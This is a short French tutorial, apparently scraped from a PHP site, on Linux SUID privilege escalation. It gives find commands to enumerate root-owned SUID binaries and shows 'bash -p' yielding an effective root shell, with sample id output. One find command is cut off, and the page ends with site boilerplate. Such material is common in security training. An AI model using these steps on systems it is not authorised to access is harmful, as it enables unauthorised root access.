SUID est un mécanisme d'autorisation sous Linux Lorsqu'un fichier avec cette autorisation est exécuté, l'appelant obtiendra temporairement les autorisations du propriétaire du fichier. Si vous disposez des autorisations SUID, vous pouvez utiliser les binaires et les outils du système pour effectuer une élévation des privilèges root.
La commande suivante peut découvrir tous les fichiers exécutables SUID exécutés sur le système. Plus précisément, la commande tentera de trouver les fichiers avec un SUID disposant des autorisations root.
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls
Tous les binaires ci-dessus seront exécutés avec les autorisations de l'utilisateur root car leurs autorisations contiennent des "s" et correspondent aux autorisations root.
Bash
La commande suivante ouvrira un shell bash avec les privilèges root.
bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!
![[Web front-end] Démarrage rapide de Node.js](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
